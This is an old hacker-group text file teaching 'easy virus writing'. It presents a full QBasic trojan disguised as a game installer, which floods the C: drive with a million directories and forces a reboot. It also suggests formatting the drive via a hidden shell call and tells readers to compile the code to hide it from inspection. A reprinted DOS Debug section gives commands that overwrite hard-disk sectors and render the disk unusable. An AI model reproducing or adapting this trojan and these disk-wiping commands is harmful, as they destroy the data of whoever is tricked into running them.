************************************* * PISS PHILEZ NUMBER 4 * * * * Easy Quick Virus Writing * * * * by Defenestrator * ************************************* WARNING: This file is for information only. If you use it in any harmful manner then me, my friends, PISS, and anyone I know cannot be held responsible. OVERVIEW -------- Today, viruses seem to be portrayed as anything which harms computers. There are many types of files like this, like trojan horses, logic bombs, real viruses, worms, etc. But all these dumbass people think all of these are viruses. If you do, you're a fuckin idiot and should read more. If you know these then skip this section. Trojan Horse- a file hidden inside another seemingly okay file which does stuff the masking program doesn't do. The name is derived from Greek mythology, when during the Iliad the Trojans gave their enemies a big damn horse as a gift, but armies were hidden inside. Just a little insight for ya. Logic Bombs- program which has a certain condition which must be met before the program starts- like the Michaelangelo virus of a few years back. It would only start on March 6, Michaelangelo's birthday, and would wipe the hard drive. However, smart people figured just set the date wrong and skip the 6th. Viruses- program which reproduces itself onto several machines, attaching on to files to procreate. Worms- program which spreads from machine to machine using one machine as a host (not used a lot) EASY WRITING ---------- To truly write a simple trojan horse, use the simplest programming language. I either use batch programming or QBasic. I also know someone who does cooll stuff in DOS Debug. All are absurdly easy to write and evade the scanners with. BATCH PROGRAMMING ----------------- Batch programming, for those of you who are newbies or just stupid, is taking MS-DOS batch commands and sticking them in a file which can be run on its own. If you don't know MS-DOS commands, I'm NOT GONNA TEACH YOU CUZ YOU'RE STUPID! I use Linux and Win95 but still know all the DOS commands. Just remember, before anything you write, put [@echo off] so that the person getting this doesn't know what's going on. QBASIC stuff ------------ QBasic is a REAL simple programming language, so if you want to learn to program this is always a starting place. I learned how to use the old BASIC in like 3rd grade, which was like 10 years ago. Most of the commands are still almost the same. And best of all, this program is either free or comes with your computer (on Win95 you gotta go get it). But it's not like I paid for any other program lately either, so to me everything's free! How can we use this to do cool things? Like this: This is an example of a trojan horse I wrote which poses as an install program for a game. The "game" is made more realistic by zipping it and adding bogus *.dat files which make it look like it's actually a real program. Here goes: REM bitch by Defenestrator COLOR 14, 0 PRINT "Are you in DOS?" INPUT x$ IF x$ = "yes" THEN GOTO 1 ELSE GOTO 2 1 PRINT "Installing datafiles..please wait..." PRINT "This may take up to 20 minutes.." SHELL "cd\" FOR a = 1 TO 1000000 a$ = STR$(a) c$ = "md" + a$ + ".hee" SHELL c$ NEXT a CLS PRINT "P.I.S.S. 1.0 is now installed on your system" PRINT "Have a shitty day!" PRINT "Press Enter to reboot your system!" OUT &H64, &HFE END 2 PRINT "Go to DOS before running P.I.S.S. 1.0" END Let's take this SIMPLE program apart. This simple trojan horse poses as an installer, but instead makes 1 million directories from the c:\ drive which cannot be deleted without being a real pain in the ass with Norton commander, or just reformatting the hard drive. The shell "" runs a DOS command without showing it, which is good if you want to be real easy and do shell "format c:\". It's also a good idea to get a compiler for QBasic because the code can be read by any text file viewer, which is the only major drawback of QBasic. That and it can't draw worth shit. So if you want to learn more QBasic, e-mail me, look in the help files, or keyword search on altavista. DOS DEBUG --------- I don't know a lot of debug, so I'm gonna reprint an article in a mail list I subscribe to. This article is courtesy of w0rmh0le. Disclaimer: I am not responsible for any damage following the guidelines of this text may incur on your system. These commands can be dangerous if used incorrectly. I am not responsible for any damage of your life, liberty, and all that good stuff, blah, blah as a result of the misuse of any materials herein. Proceed with extreme caution. Have a nice day. Dos Debug which is distributed with every version of Windows 95 has some interesting commands which I think many people have overlooked. In this post I will show you some very powerful things you can do with this tiny, harmless little program.... Please note that commands are not case sensitive and I have used capitals in most cases for clarification. To start debug, go get the dos command prompt (whichever way you prefer). You should get a hyphen "-" prompt. You can type "?" followed by return at this time to get a list of all (documented) commands. All commands are followed by returns btw. Anyway, the commands we are interested in are L (load), W (write), and F (fill), I'll explain load first. NOTE: All values must be in hexadecimal. It sounds confusing at first, but it's really not once you know what you are doing. To use load, one usually does something like this: -N foo.com -L 100 This tells the computer the name of the program you are working on, and where to load it into memory. However, we are going to use a more arcane method, which is called the absolute read. (voice echoes) An absolute read simply allows you to read byte space straight off of any disk on your computer. You do this by first typing "L" at the hyphen, followed by the address in memory you want it loaded into, followed by a number specifying the drive number ( 0 = A:, 1 = B:, 2 = C:, etc. ) followed by the sector address to begin reading at followed by the amount of bytes to read. Easy, no? Hehe. Ex. L 0 0 0 25 This loads 25h bytes from the first sector of the floppy disk in A: into memory starting at offset 0h in the current segment. Note that a max of 80h bytes can be read at one time. The write command is almost exactly the same as the read command, so it doesn't require much explanation now except that it does the opposite of the load command. Ex. W 0 0 0 25 This writes 25h bytes to A: from 0h in memory to the first sector of the disk. To use fill, type "F" followed by the memory address you want to start filling at, followed by an "L", followed by how many bytes to fill and finally the byte you want to fill with. The "L" does not mean load, but rather length. Ex. F 100 L 25 FF This would fill 25h bytes starting at 100h in memory with the byte value FF which, by the way, is basically meaningless. Now for the fun part. If you understand all of the above, either you are very persistant, or you know something of how disks really work. Bringing it all together is the key here. I will first show you an attack which can take less than a minute to do. My comments are followed by the semicolons. C:\>debug -F 0 L 80 00 ;fill an area of memory with 00h null bytes. -W 0 2 0 80 ;write to the drive. -Q ;quit This attack has just rendered the hard disk unusable in less than a minutes time. I recommend IF YOU KNOW WHAT YOU ARE DOING to try this out on a floppy disk. It will be rendered unusable. The commands follow: C:\>debug -F 0 L 80 00 -W 0 0 0 80 ;take note of the second zero PLEASE. -Q Ok, Im done with the malicious stuff, onto some fun. I have found out that volume labels in dos start at the 27th byte of any hard or floppy disk. Check this out: -L 0 0 0 80 ;change the second zero to whatever if you want. -E 27 xx xx xx xx ;where the xx's are the new label in bytes. You have to insert your label backwards in pairs of two. -W 0 0 0 80 ;write to floppy. -Q ;quit The "E" commands enters our bytes into memory. Phun ex. -L 0 0 0 80 -E 27 66 06 00 00 ;Figure this one out on your own... -W 0 0 0 80 -Q There are numerous other things you can play with too, so get some debug docs, or e-mail me for one I found. Have phun! <-----a production of-----> \/\/0rmH0Le w0rmh0le@hotmail.com "Internet security is an oxymoron" ---------------------------------------------------------------------- PISS - People into Serious Shit Founderz - Defenestrator, PhrostByte Memberz - Author Parselon Wu Forever kQs CGibbons Extinction Faekon/Homarid Grench Greenseed Tim 121 Rhodekyll Contributors- Sameer Ketkar Want more stuff? Go to http://www.angelfire.com/sc/PISS/philez.html The site will change as soon as I get money for one.. E-mail the group at davematthews@rocketmail.com ©1997 PISS Publications This file may be posted freely as long as this notice stays on the file. All rights reserved.